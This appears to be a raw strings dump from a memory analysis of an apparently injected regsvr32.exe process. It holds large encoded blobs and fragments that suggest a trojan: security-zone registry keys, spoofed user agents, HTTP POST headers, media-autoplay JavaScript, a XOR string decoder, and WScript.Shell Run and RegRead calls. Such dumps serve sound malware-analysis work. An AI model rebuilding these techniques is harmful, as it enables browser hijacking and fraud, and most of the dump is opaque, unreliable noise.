khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_1260_rwx_01000000_00005000:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration
regsvr32.exe_684_rwx_00080000_000C2000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
2 2*393
2 2*393
7:8?8[8`8
7:8?8[8`8
8$8(8,8084888
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc 